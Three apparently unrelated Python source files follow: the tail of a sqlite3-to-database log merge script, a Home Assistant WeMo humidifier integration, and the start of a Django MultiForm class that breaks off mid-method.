g_check_and_dont_create_if_empty = args['check_and_dont_create_if_empty']
use_popen_mode = not args['dump_to_file_mode']
if args['target_db_type'] == "sqlite3":
if args['target_sqlite3_file'] is None:
raise Exception("INVALID: sqlite3 merge mode requires --target_sqlite3_file option to be specified - ABORT")
else:
use_popen_mode = False # dump to .sql file for .read
print("NOTE: now we delete pre y2k rows and if it was popen then the delete would error as 'database is locked' so always dump schema to sql - so force set use_popen_mode = False")
use_popen_mode = False
if (use_popen_mode):
print("using live in-memory pipe of sqlite3 dump output parse mode")
else:
print("using full dump of sqlite3 to file mode")
dump_process = None
dumped_sql_fp = None
if (use_popen_mode):
print("starting sqlite3 subporcess...")
dump_process = popen_sqlite3_dump(args)
if dump_process is None:
raise Exception("FATAL: dump_process is None in popen_mode - ABORT")
else:
print("starting sqlite3 to dump db to .sql file...")
dumped_sql_fp = dump_db_to_sql(dir_processing_azm)
if dumped_sql_fp is None:
raise Exception("FATAL: dumped_sql_fp is None in non popen_mode - ABORT")
# sqlite3 merge is simple run .read on args['dumped_sql_fp']
if args['target_db_type'] == "sqlite3":
is_target_exists = os.path.isfile(args['target_sqlite3_file'])
print("sqlite3 - import to {} from {}".format(args['target_sqlite3_file'], dumped_sql_fp))
dumped_sql_fp_adj = dumped_sql_fp + "_adj.sql"
of = open(dumped_sql_fp,"r")
nf = open(dumped_sql_fp_adj,"w") # wb required for windows so that \n is 0x0A - otherwise \n will be 0x0D 0x0A and doest go with our fmt file and only 1 row will be inserted per table csv in bulk inserts...
while True:
ofl = of.readline().decode()
if ofl == "":
break
ofl = ofl.replace("CREATE TABLE android_metadata (locale TEXT);","",1)
ofl = ofl.replace('CREATE TABLE "','CREATE TABLE IF NOT EXISTS "',1)
if ofl.startswith('INSERT INTO "android_metadata"'):
ofl = ""
if is_target_exists:
# dont insert or create qgis tables
if ofl.startswith("CREATE TABLE geometry_columns") or ofl.startswith("CREATE TABLE spatial_ref_sys") or ofl.startswith('INSERT INTO "spatial_ref_sys"') or ofl.startswith('INSERT INTO "geometry_columns"'):
ofl = ""
nf.write(ofl)
#nf.write('\n')
nf.close()
of.close()
cmd = [
args['sqlite3_executable'],
args['target_sqlite3_file'],
".read {}".format(dumped_sql_fp_adj.replace("\\", "\\\\"))
]
print("cmd: ",cmd)
ret = call(cmd, shell=False)
print("import ret: "+str(ret))
if (ret == 0):
print(( "\n=== SUCCESS - import completed in %s seconds" % (time.time() - proc_start_time) ))
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
else:
cleanup_tmp_dir(dir_processing_azm)
return 0
else:
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
else:
cleanup_tmp_dir(dir_processing_azm)
raise Exception("\n=== FAILED - ret %d - operation completed in %s seconds" % (ret, time.time() - proc_start_time))
raise Exception("FATAL: sqlite3 mode merge process failed - invalid state")
# now we use bulk insert done at the create/commit funcs instead of: g_insert_function = getattr(mod, 'handle_sqlite3_dump_insert')
print("### connecting to dbms...")
ret = g_connect_function(args)
if ret == False:
raise Exception("FATAL: connect_function failed")
if (args['unmerge']):
print("### unmerge mode")
# unmerge mode would be handled by same check_if_already_merged_function below - the 'unmerge' flag is in args
# check if this azm is already imported/merged in target db (and exit of already imported)
# get log_hash
sqlstr = "select log_hash from logs limit 1"
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
log_hash = outstr.strip()
args['log_hash'] = int(log_hash)
print("args['log_hash']:", args['log_hash'])
sqlstr = "select log_timezone_offset from logs limit 1"
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
tzoff = outstr.strip()
args['log_timezone_offset'] = int(tzoff) # in millis
print("args['log_timezone_offset']:", args['log_timezone_offset'])
ori_log_hash_datetime = datetime.fromtimestamp(
(args['log_hash'] & 0xffffffff),
timezone(args['log_timezone_offset']/1000)
) # log_hash lower 32 bits is the timestamp
args['ori_log_hash_datetime'] = ori_log_hash_datetime
print("args['ori_log_hash_datetime']:", args['ori_log_hash_datetime'])
log_hash_ym_str = ori_log_hash_datetime.strftime('%Y_%m')
args['log_hash_ym_str'] = log_hash_ym_str
print("args['log_hash_ym_str']:", args['log_hash_ym_str'])
if log_hash == 0:
raise Exception("FATAL: invalid log_hash == 0 case")
args['log_start_time_str'] = get_sql_result(
"select log_start_time from logs limit 1",
args
)
args['log_end_time_str'] = get_sql_result(
"select log_end_time from logs limit 1",
args
)
#print "args['log_end_time_str']:", args['log_end_time_str']
args['log_start_time'] = get_sql_result(
"select strftime('%s', log_start_time) from logs limit 1",
args
)
print("parse log_start_time:", args['log_start_time'])
args['log_start_time'] = datetime.fromtimestamp(int(args['log_start_time']))
print("args['log_start_time']:", args['log_start_time'])
print("args['log_start_time_str']:", args['log_start_time_str'])
args['log_end_time'] = get_sql_result(
"select strftime('%s', log_end_time) from logs limit 1",
args
)
# in some rare cases with older apks, log_end_time somehow didn't get into the db
if not args['log_end_time']:
args['log_end_time'] = get_sql_result(
"select strftime('%s', max(time)) from android_info_1sec",
args
)
print("parse log_end_time:", args['log_end_time'])
args['log_end_time'] = datetime.fromtimestamp(int(args['log_end_time']))
print("args['log_end_time']:", args['log_end_time'])
print("args['log_end_time_str']:", args['log_end_time_str'])
args['log_data_min_time'] = args['log_start_time'] - timedelta(hours=48)
print("args['log_data_min_time']:", args['log_data_min_time'])
args['log_data_max_time'] = args['log_end_time'] + timedelta(hours=48)
print("args['log_data_max_time']:", args['log_data_max_time'])
if log_hash == 0:
raise Exception("FATAL: invalid log_hash == 0 case")
g_check_if_already_merged_function(args, log_hash)
''' now we're connected and ready to import, open the dumped file and handle CREATE/INSERT
operations for the current target_type (DBMS type)'''
if (use_popen_mode == False):
sql_dump_file = open(dumped_sql_fp, 'rb')
# output for try manual import mode
# args['out_sql_dump_file'] = open("out_for_dbtype_{}.sql".format(args['file']), 'w')
dprint("entering main loop")
n_lines_parsed = 0
while(True):
if (use_popen_mode):
line = dump_process.stdout.readline().decode()
else:
line = sql_dump_file.readline().decode()
dprint("read line: "+line)
# when EOF is reached, we'd get an empty string
if (line == ""):
print("\nreached end of file/output")
break
else:
n_lines_parsed = n_lines_parsed + 1
handle_sql3_dump_line(args, line)
# finally call commit again in case the file didn't have a 'commit' line at the end
print("### calling handler's commit func as we've reached the end...")
handle_ret = g_commit_function(args, line)
# call close() for that dbms handler
operation = "merge/import"
if (args['unmerge']):
operation = "unmerge/delete"
else:
# set "pg_newest_azm_app_ver" in redis
try:
import redis
redis_cache = redis.Redis(host='redis', port=6379)
if args['app_ver_newer_than_in_pg'] or redis_cache.get("pg_newest_azm_app_ver") is None:
print('need do redis_cache set("pg_newest_azm_app_ver")')
redis_cache.set("pg_newest_azm_app_ver", args['app_ver'])
else:
print('no need do redis_cache set("pg_newest_azm_app_ver")')
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("redis set pg_newest_azm_app_ver excepition:", exstr)
if (n_lines_parsed != 0):
print(( "\n=== SUCCESS - %s completed in %s seconds - tatal n_lines_parsed %d (not including bulk-inserted-table-content-lines)" % (operation, time.time() - proc_start_time, n_lines_parsed) ))
ret = 0
mv_azm_to_target_folder(args)
else:
raise Exception("\n=== FAILED - %s - no lines parsed - tatal n_lines_parsed %d operation completed in %s seconds ===" % (operation, n_lines_parsed, time.time() - proc_start_time))
except Exception as e:
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
mv_target_folder = args['move_failed_import_azm_files_to_folder']
if not mv_target_folder is None and not os.path.exists(mv_target_folder):
os.makedirs(mv_target_folder)
if not mv_target_folder is None:
azm_fp = os.path.abspath(args['azm_file'])
target_fp = os.path.join(mv_target_folder,os.path.basename(azm_fp))
try:
os.remove(target_fp)
os.remove(target_fp+"_output.txt")
except Exception as x:
pass
print("move the failed_import_azm_files_to_folder: mv {} to {}".format(azm_fp,target_fp))
try:
os.rename(azm_fp, target_fp)
try:
os.rename(azm_fp+"_output.txt", target_fp+"_output.txt")
except:
pass
except Exception as x:
print("WARNING: move_failed_import_azm_files_to_folder failed")
pass
print("re-raise exception e - ",exstr)
raise e
finally:
print("cleanup start...")
if (use_popen_mode):
# clean-up dump process
try:
dump_process.kill()
dump_process.terminate()
except:
pass
else:
try:
sql_dump_file.close()
except:
pass
try:
g_close_function(args)
except:
pass
if debug_helpers.debug == 1 or args['keep_temp_dir']:
print("debug mode keep_tmp_dir:", dir_processing_azm)
pass # keep files for analysis of exceptions in debug mode
else:
print("cleanup_tmp_dir...")
cleanup_tmp_dir(dir_processing_azm)
return ret
def sigterm_handler(_signo, _stack_frame):
print("azm_db_merge.py: received SIGTERM - exit(0) now...")
sys.exit(0)
return
def get_sql_result(sqlstr, args):
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("get_sql_result cmd:", cmd)
outstr = subprocess.check_output(cmd).decode()
result = outstr.strip()
return result
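# Usage sketch for get_sql_result (mirrors how it is used in process_azm_file;
# args['sqlite3_executable'] and args['file'] must already be set):
# log_start = get_sql_result("select log_start_time from logs limit 1", args)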
pidfilename_prefix = "pls_clean_folder_if_no_pid_"
pidfilename_suffix = ".txt"
pidfile_glob_pattern = "/tmpfs/*/{}*{}".format(pidfilename_prefix, pidfilename_suffix)
def gen_pidfile_in_tmp_dir(d):
try:
pid = os.getpid()
pid_file_fp = os.path.join(d, "{}{}{}".format(pidfilename_prefix, pid, pidfilename_suffix))
print("gen_pidfile_in_tmp_dir:", pid_file_fp)
with open(pid_file_fp, "w") as f:
f.write(d)
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("WARNING: gen_pidfile_in_tmp_dir exception: {}".format(exstr))
def cleanup_old_tmpfs_tmp_dirs_with_invalid_pid_files():
pid = os.getpid()
# cleanup older died pid files
pidfiles = glob.glob(pidfile_glob_pattern)
this_container_pids = psutil.pids()
for pidfile_fp in pidfiles:
try:
pidfile_pid_str = os.path.basename(pidfile_fp).split(pidfilename_prefix)[1].split(pidfilename_suffix)[0]
pidfile_pid = int(pidfile_pid_str)
if pidfile_pid != pid:
if pidfile_pid not in this_container_pids:
print("pidfile_pid not in this_container_pids: {} {}".format(pidfile_pid, this_container_pids))
with open(pidfile_fp, "r") as f:
tmp_dir = f.read().strip()
if os.path.isdir(tmp_dir):
print("cleaning up dead pidfile tmp_dir:", tmp_dir)
shutil.rmtree(tmp_dir)
except:
type_, value_, traceback_ = sys.exc_info()
exstr = str(traceback.format_exception(type_, value_, traceback_))
print("WARNING: check pidfile_fp {} exception: {}".format(pidfile_fp, exstr))
if __name__ == '__main__':
#################### Program START
print(infostr)
signal.signal(signal.SIGTERM, sigterm_handler)
args = parse_cmd_args()
args["table_operation_stats"] = {
"table": [],
"operation": [],
"duration": []
}
# must be localhost only because now we're using BULK INSERT (or COPY) commands
if args['docker_postgres_server_name'] is not None:
args['pg_host'] = args['docker_postgres_server_name']
if (args['unmerge']):
print("starting with --unmerge mode")
print("checking --sqlite3_executable: ",args['sqlite3_executable'])
try:
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Secified (or default) --sqlite3_executable not working - ABORT")
except Exception as e:
estr = str(e)
print("error - sqlite3 check exception estr: ",estr)
if "The system cannot find the file specified" in estr:
print("windows run: can't call specified sqlite3_executable - trying use 'where' to find the default 'sqlite3' executable.")
outstr = subprocess.check_output(
["cmd.exe",
"/c",
"where",
"sqlite3"
]
).decode()
print("where returned: ",outstr.strip())
print("blindly using where return val as sqlite3 path...")
args['sqlite3_executable'] = outstr.strip()
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Secified (or default) --sqlite3_executable not working - ABORT")
else:
args['sqlite3_executable'] = "./sqlite3"
cmd = [
args['sqlite3_executable'],
"--version"
]
ret = call(cmd, shell=False)
if ret == 0:
print("sqlite3_executable working - OK")
else:
raise Exception("Failed to find sqlite3 - please install sqlite3 and make sure it is in the path first. exception:"+str(e))
omit_tables = "spatial_ref_sys,geometry_columns,log_decode_message,azq_internal_types,"+args['exclude_tables']
omit_tables_array = omit_tables.split(",")
args['omit_tables_array'] = omit_tables_array
only_tables = "logs,"+args['only_tables']
only_tables_array = only_tables.split(",")
args['only_tables_array'] = only_tables_array
if only_tables == "logs,": # logs is default table - nothing added
args['only_tables_on'] = False
else:
args['only_tables_on'] = True
if not args['move_imported_azm_files_to_folder'] is None:
try:
os.mkdir(args['move_imported_azm_files_to_folder'])
except:
pass # ok - folder likely already exists...
if os.path.isdir(args['move_imported_azm_files_to_folder']):
pass
else:
raise Exception("ABORT: Can't create or access folder specified by --move_imported_azm_files_to_folder: "+str(args['move_imported_azm_files_to_folder']))
mod_name = args['target_db_type']
if args['debug']:
print("set_debug 1")
debug_helpers.set_debug(1)
else:
print("set_debug 0")
debug_helpers.set_debug(0)
#if mod_name in ['postgresql','mssql']:
mod_name = 'gen_sql'
mod_name = mod_name + "_handler"
print("### get module: ", mod_name)
importlib.import_module(mod_name)
mod = sys.modules[mod_name]
#print "module dir: "+str(dir(mod))
g_connect_function = getattr(mod, 'connect')
g_check_if_already_merged_function = getattr(mod, 'check_if_already_merged')
g_create_function = getattr(mod, 'create')
g_commit_function = getattr(mod, 'commit')
g_close_function = getattr(mod, 'close')
if "," in args['azm_file']:
print("found comman in args['azm_file'] - split and use whichever is first present in the list")
csv = args['azm_file']
found = False
for fp in csv.split(","):
if os.path.isfile(fp):
args['azm_file'] = fp
print("using valid azm_file file path:", args['azm_file'])
found = True
break
if not found:
raise Exception("Failed to find any valid existing azm file in supplied comma separated --azm_file option:"+str(args['azm_file']))
azm_file_is_folder = os.path.isdir(args['azm_file'])
folder_daemon = not args['daemon_mode_rerun_on_folder_after_seconds'] is None
folder_daemon_wait_seconds = 60
if folder_daemon:
if not azm_file_is_folder:
raise Exception("ABORT: --daemon_mode_rerun_on_folder_after_seconds specified but --azm_file is not a folder.")
folder_daemon_wait_seconds = int(args['daemon_mode_rerun_on_folder_after_seconds'])
print("folder_daemon_wait_seconds: ",folder_daemon_wait_seconds)
if folder_daemon_wait_seconds <= 0:
raise Exception("ABORT: --daemon_mode_rerun_on_folder_after_seconds option must be greater than 0.")
ori_args = args
if args['add_imei_id_to_all_tables']:
# get imei
imei = None
col = "IMEI"
table = "log_info"
where = "where {} != ''".format(col) # not null and not empty
sqlstr = "select {} from {} {} order by seqid desc limit 1;".format(col, table, where)
cmd = [args['sqlite3_executable'],args['file'],sqlstr]
print("call cmd:", cmd)
imei = subprocess.check_output(cmd).decode().strip()
args['imei'] = imei
while(True):
process_start_time = time.time()
args = ori_args.copy() # args gets modified by each run - especially ['azm_file'] gets changed - so we use a copy of the original args here (otherwise args would get modified and we wouldn't be able to restore the original for daemon-mode re-runs)
azm_files = []
# check if supplied 'azm_file' is a folder - then iterate over all azms in that folder
if azm_file_is_folder:
dir = args['azm_file']
print("supplied --azm_file: ",dir," is a directory - get a list of .azm files to process:")
matches = []
# recurse as below instead of: azm_files = glob.glob(os.path.join(dir,"*.azm"))
# http://stackoverflow.com/questions/2186525/use-a-glob-to-find-files-recursively-in-python
for root, dirnames, filenames in os.walk(dir):
for filename in fnmatch.filter(filenames, '*.azm'):
matches.append(os.path.join(root, filename))
azm_files = matches
else:
azm_files = [args['azm_file']]
nazm = len(azm_files)
print("n_azm_files to process: {}".format(nazm))
print("list of azm files to process: "+str(azm_files))
iazm = 0
ifailed = 0
ret = -1
had_errors = False
for azm in azm_files:
iazm = iazm + 1
args['azm_file'] = azm
print("## START process azm {}/{}: '{}'".format(iazm, nazm, azm))
try:
ret = process_azm_file(args)
if (ret != 0):
raise Exception("ABORT: process_azm_file failed with ret code: "+str(ret))
print("## DONE process azm {}/{}: '{}' retcode {}".format(iazm, nazm, azm, ret))
except Exception as e:
ifailed = ifailed + 1
had_errors = True
type_, value_, traceback_ = sys.exc_info()
exstr = traceback.format_exception(type_, value_, traceback_)
print("## FAILED: process azm {} failed with below exception:\n(start of exception)\n{}\n{}(end of exception)".format(azm,str(e),exstr))
if (args['folder_mode_stop_on_first_failure']):
print("--folder_mode_stop_on_first_failure specified - exit now.")
exit(-9)
if (had_errors == False):
print("SUCCESS - operation completed successfully for all azm files (tatal: %d) - in %.03f seconds." % (iazm, time.time() - process_start_time))
else:
print("COMPLETED WITH ERRORS - operation completed but had encountered errors (tatal: %d, failed: %d) - in %.03f seconds - (use --folder_mode_stop_on_first_failure to stop on first failed azm file)." % (iazm,ifailed, time.time() - process_start_time))
if not folder_daemon:
import pandas as pd
stats_df = pd.DataFrame(args["table_operation_stats"]).sort_values("duration", ascending=False)
print("stats_df.head(20):\n", stats_df.head(20))
print("exit code:",str(ret))
exit(ret)
else:
print("*** folder_daemon mode: wait seconds: ",folder_daemon_wait_seconds)
for i in range(0,folder_daemon_wait_seconds):
print("** folder_daemon mode: waiting ",i,"/",folder_daemon_wait_seconds," seconds")
time.sleep(1)
|
|
"""Support for WeMo humidifier."""
import asyncio
from datetime import timedelta
import logging
import async_timeout
from pywemo import discovery
import requests
import voluptuous as vol
from homeassistant.components.fan import (
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
from . import SUBSCRIPTION_REGISTRY
from .const import DOMAIN, SERVICE_RESET_FILTER_LIFE, SERVICE_SET_HUMIDITY
SCAN_INTERVAL = timedelta(seconds=10)
DATA_KEY = "fan.wemo"
_LOGGER = logging.getLogger(__name__)
ATTR_CURRENT_HUMIDITY = "current_humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_FAN_MODE = "fan_mode"
ATTR_FILTER_LIFE = "filter_life"
ATTR_FILTER_EXPIRED = "filter_expired"
ATTR_WATER_LEVEL = "water_level"
# The WEMO_ constants below come from pywemo itself
WEMO_ON = 1
WEMO_OFF = 0
WEMO_HUMIDITY_45 = 0
WEMO_HUMIDITY_50 = 1
WEMO_HUMIDITY_55 = 2
WEMO_HUMIDITY_60 = 3
WEMO_HUMIDITY_100 = 4
WEMO_FAN_OFF = 0
WEMO_FAN_MINIMUM = 1
WEMO_FAN_LOW = 2 # Not used due to limitations of the base fan implementation
WEMO_FAN_MEDIUM = 3
WEMO_FAN_HIGH = 4 # Not used due to limitations of the base fan implementation
WEMO_FAN_MAXIMUM = 5
WEMO_WATER_EMPTY = 0
WEMO_WATER_LOW = 1
WEMO_WATER_GOOD = 2
SUPPORTED_SPEEDS = [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
SUPPORTED_FEATURES = SUPPORT_SET_SPEED
# Since the base fan object supports a set list of fan speeds,
# we have to reuse some of them when mapping to the 5 WeMo speeds
WEMO_FAN_SPEED_TO_HASS = {
WEMO_FAN_OFF: SPEED_OFF,
WEMO_FAN_MINIMUM: SPEED_LOW,
WEMO_FAN_LOW: SPEED_LOW, # Reusing SPEED_LOW
WEMO_FAN_MEDIUM: SPEED_MEDIUM,
WEMO_FAN_HIGH: SPEED_HIGH, # Reusing SPEED_HIGH
WEMO_FAN_MAXIMUM: SPEED_HIGH,
}
# Because we reused mappings in the previous dict, we have to filter them
# back out in this dict, or else we would have duplicate keys
HASS_FAN_SPEED_TO_WEMO = {
v: k
for (k, v) in WEMO_FAN_SPEED_TO_HASS.items()
if k not in [WEMO_FAN_LOW, WEMO_FAN_HIGH]
}
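# For reference, the reverse mapping built above is effectively:
# HASS_FAN_SPEED_TO_WEMO == {
#     SPEED_OFF: WEMO_FAN_OFF,
#     SPEED_LOW: WEMO_FAN_MINIMUM,
#     SPEED_MEDIUM: WEMO_FAN_MEDIUM,
#     SPEED_HIGH: WEMO_FAN_MAXIMUM,
# }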
SET_HUMIDITY_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_TARGET_HUMIDITY): vol.All(
vol.Coerce(float), vol.Range(min=0, max=100)
),
}
)
RESET_FILTER_LIFE_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_ids})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up discovered WeMo humidifiers."""
if DATA_KEY not in hass.data:
hass.data[DATA_KEY] = {}
if discovery_info is None:
return
location = discovery_info["ssdp_description"]
mac = discovery_info["mac_address"]
try:
device = WemoHumidifier(discovery.device_from_description(location, mac))
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as err:
_LOGGER.error("Unable to access %s (%s)", location, err)
raise PlatformNotReady
hass.data[DATA_KEY][device.entity_id] = device
add_entities([device])
def service_handle(service):
"""Handle the WeMo humidifier services."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
humidifiers = [
device
for device in hass.data[DATA_KEY].values()
if device.entity_id in entity_ids
]
if service.service == SERVICE_SET_HUMIDITY:
target_humidity = service.data.get(ATTR_TARGET_HUMIDITY)
for humidifier in humidifiers:
humidifier.set_humidity(target_humidity)
elif service.service == SERVICE_RESET_FILTER_LIFE:
for humidifier in humidifiers:
humidifier.reset_filter_life()
# Register service(s)
hass.services.register(
DOMAIN, SERVICE_SET_HUMIDITY, service_handle, schema=SET_HUMIDITY_SCHEMA
)
hass.services.register(
DOMAIN,
SERVICE_RESET_FILTER_LIFE,
service_handle,
schema=RESET_FILTER_LIFE_SCHEMA,
)
class WemoHumidifier(FanEntity):
"""Representation of a WeMo humidifier."""
def __init__(self, device):
"""Initialize the WeMo switch."""
self.wemo = device
self._state = None
self._available = True
self._update_lock = None
self._fan_mode = None
self._target_humidity = None
self._current_humidity = None
self._water_level = None
self._filter_life = None
self._filter_expired = None
self._last_fan_on_mode = WEMO_FAN_MEDIUM
self._model_name = self.wemo.model_name
self._name = self.wemo.name
self._serialnumber = self.wemo.serialnumber
def _subscription_callback(self, _device, _type, _params):
"""Update the state by the Wemo device."""
_LOGGER.info("Subscription update for %s", self.name)
updated = self.wemo.subscription_update(_type, _params)
self.hass.add_job(self._async_locked_subscription_callback(not updated))
async def _async_locked_subscription_callback(self, force_update):
"""Handle an update from a subscription."""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
await self._async_locked_update(force_update)
self.async_schedule_update_ha_state()
@property
def unique_id(self):
"""Return the ID of this WeMo humidifier."""
return self._serialnumber
@property
def name(self):
"""Return the name of the humidifier if any."""
return self._name
@property
def is_on(self):
"""Return true if switch is on. Standby is on."""
return self._state
@property
def available(self):
"""Return true if switch is available."""
return self._available
@property
def icon(self):
"""Return the icon of device based on its type."""
return "mdi:water-percent"
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return {
ATTR_CURRENT_HUMIDITY: self._current_humidity,
ATTR_TARGET_HUMIDITY: self._target_humidity,
ATTR_FAN_MODE: self._fan_mode,
ATTR_WATER_LEVEL: self._water_level,
ATTR_FILTER_LIFE: self._filter_life,
ATTR_FILTER_EXPIRED: self._filter_expired,
}
@property
def speed(self) -> str:
"""Return the current speed."""
return WEMO_FAN_SPEED_TO_HASS.get(self._fan_mode)
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return SUPPORTED_SPEEDS
@property
def supported_features(self) -> int:
"""Flag supported features."""
return SUPPORTED_FEATURES
async def async_added_to_hass(self):
"""Wemo humidifier added to HASS."""
# Define inside async context so we know our event loop
self._update_lock = asyncio.Lock()
registry = SUBSCRIPTION_REGISTRY
await self.hass.async_add_executor_job(registry.register, self.wemo)
registry.on(self.wemo, None, self._subscription_callback)
async def async_update(self):
"""Update WeMo state.
Wemo has an aggressive retry logic that sometimes can take over a
minute to return. If we don't get a state after 5 seconds, assume the
Wemo humidifier is unreachable. If update goes through, it will be made
available again.
"""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
try:
with async_timeout.timeout(5):
await asyncio.shield(self._async_locked_update(True))
except asyncio.TimeoutError:
_LOGGER.warning("Lost connection to %s", self.name)
self._available = False
async def _async_locked_update(self, force_update):
"""Try updating within an async lock."""
async with self._update_lock:
await self.hass.async_add_executor_job(self._update, force_update)
def _update(self, force_update=True):
"""Update the device state."""
try:
self._state = self.wemo.get_state(force_update)
self._fan_mode = self.wemo.fan_mode_string
self._target_humidity = self.wemo.desired_humidity_percent
self._current_humidity = self.wemo.current_humidity_percent
self._water_level = self.wemo.water_level_string
self._filter_life = self.wemo.filter_life_percent
self._filter_expired = self.wemo.filter_expired
if self.wemo.fan_mode != WEMO_FAN_OFF:
self._last_fan_on_mode = self.wemo.fan_mode
if not self._available:
_LOGGER.info("Reconnected to %s", self.name)
self._available = True
except AttributeError as err:
_LOGGER.warning("Could not update status for %s (%s)", self.name, err)
self._available = False
def turn_on(self, speed: str = None, **kwargs) -> None:
"""Turn the switch on."""
if speed is None:
self.wemo.set_state(self._last_fan_on_mode)
else:
self.set_speed(speed)
def turn_off(self, **kwargs) -> None:
"""Turn the switch off."""
self.wemo.set_state(WEMO_FAN_OFF)
def set_speed(self, speed: str) -> None:
"""Set the fan_mode of the Humidifier."""
self.wemo.set_state(HASS_FAN_SPEED_TO_WEMO.get(speed))
def set_humidity(self, humidity: float) -> None:
"""Set the target humidity level for the Humidifier."""
if humidity < 50:
self.wemo.set_humidity(WEMO_HUMIDITY_45)
elif 50 <= humidity < 55:
self.wemo.set_humidity(WEMO_HUMIDITY_50)
elif 55 <= humidity < 60:
self.wemo.set_humidity(WEMO_HUMIDITY_55)
elif 60 <= humidity < 100:
self.wemo.set_humidity(WEMO_HUMIDITY_60)
elif humidity >= 100:
self.wemo.set_humidity(WEMO_HUMIDITY_100)
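# For illustration (using the WEMO_HUMIDITY_* constants referenced above):
# set_humidity(47) selects WEMO_HUMIDITY_45, set_humidity(57) selects
# WEMO_HUMIDITY_55 and set_humidity(100) selects WEMO_HUMIDITY_100.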
def reset_filter_life(self) -> None:
"""Reset the filter life to 100%."""
self.wemo.reset_filter_life()
|
|
from __future__ import unicode_literals
from collections import defaultdict, OrderedDict
from itertools import chain
from functools import reduce
import operator
from django.core.exceptions import ImproperlyConfigured
from django.forms.forms import BaseForm
from django.forms.utils import ErrorList
from django.forms.widgets import Media
from django.utils.safestring import mark_safe
class InvalidArgument:
pass
class MultiForm(BaseForm):
"""
A BaseForm subclass that can wrap several sub-forms into one entity.
To use it, define a `base_forms` attribute which should be a mapping
(dict or collections.OrderedDict for example).
It can then be used like a regular form.
"""
base_fields = None # Needed to bypass the absence of fancy metaclass
_baseform_signature = OrderedDict([ # TODO: signature objects (pep 362)
('data', None),
('files', None),
('auto_id', 'id_%s'),
('prefix', None),
('initial', None),
('error_class', ErrorList),
('label_suffix', ':'),
('empty_permitted', False),
])
def __init__(self, *args, **kwargs):
sig_kwargs, extra_kwargs = self._normalize_init_signature(args, kwargs)
self._init_parent(**sig_kwargs)
self._init_wrapped_forms(sig_kwargs, extra_kwargs)
def _init_parent(self, **kwargs):
super(MultiForm, self).__init__(**kwargs)
def _normalize_init_signature(self, args, kwargs):
"""
Put all the given arguments to __init__ into a dict, whether they were
passed as positional arguments or keyword ones.
Return two dictionaries: the normalized init arguments and another one
with the extra ones (not part of the signature).
"""
if len(args) > len(self._baseform_signature):
msg = "%s.__init__ got too many positional arguments."
raise TypeError(msg % self.__class__)
normalized_kwargs = self._baseform_signature.copy()
for k, v in zip(self._baseform_signature, args):
if k in kwargs:
msg = "%s.__init__ got multiple values for argument '%s'"
raise TypeError(msg % (self.__class__, k))
normalized_kwargs[k] = v
for k in list(self._baseform_signature)[len(args):]: # remaining ones
try:
normalized_kwargs[k] = kwargs.pop(k)
except KeyError:
pass
# at this point, ``kwargs`` only contain keys that are not
# in the form's signature
return normalized_kwargs, kwargs
def _init_wrapped_forms(self, sig_kwargs, extra_kwargs):
"""
Initialize the wrapped forms by passing the ones received in __init__
and adding the keyword arguments whose names look like `$name__*`.
"""
base_forms = self.get_base_forms()
# We start by extracting all the keyword parameters that look like
# "$name__*" where $name is the name of one of the wrapped form.
# With this, we build a mapping of (name -> stripped_kwargs)
# where the stripped_kwargs have been stripped off of the form's name.
dispatched_kwargs = defaultdict(dict)
for k in list(extra_kwargs): # Because we mutate it
prefix, _, remainder = k.partition('__')
if remainder and prefix in base_forms:
dispatched_kwargs[prefix][remainder] = extra_kwargs.pop(k)
# Any extra_kwargs left at this point will be passed as-is to all
# wrapped forms.
self.forms = OrderedDict()
for name, form_class in base_forms.items():
# We build each wrapped form one by one.
# Their keyword arguments are built in three steps; each later step
# takes precedence over the earlier ones:
# 1) For all the keywords that are part of the normal signature,
# we check for the presence of a dispatch_init_$keyword method
# on the instance.
# If no such method is present, we just pass the value of the
# argument as-is.
# If such a method exists, then we use the result of calling
# this method, passing the form's name and the original value.
# 2) For any existing ``extra_kwargs`` we check for the presence
# of a dispatch_init_$keyword method on the instance.
# If no such method is present, we just pass the value of the
# argument as-is.
# If such a method exists, then we use the result of calling
# this method, passing the form's name and the original value.
# 3) If some dispatched_kwargs exist for this method (that is,
# keyword arguments passed to the MultiForm's __init__ whose
# name look like "$name__*"), then they are applied.
kwargs = {}
for k, v in chain(sig_kwargs.items(), extra_kwargs.items()):
if hasattr(self, 'dispatch_init_%s' % k):
v = getattr(self, 'dispatch_init_%s' % k)(name, v)
if v is InvalidArgument:
continue
kwargs[k] = v
kwargs.update(dispatched_kwargs[name])
self.forms[name] = form_class(**kwargs)
def dispatch_init_prefix(self, name, prefix):
"""
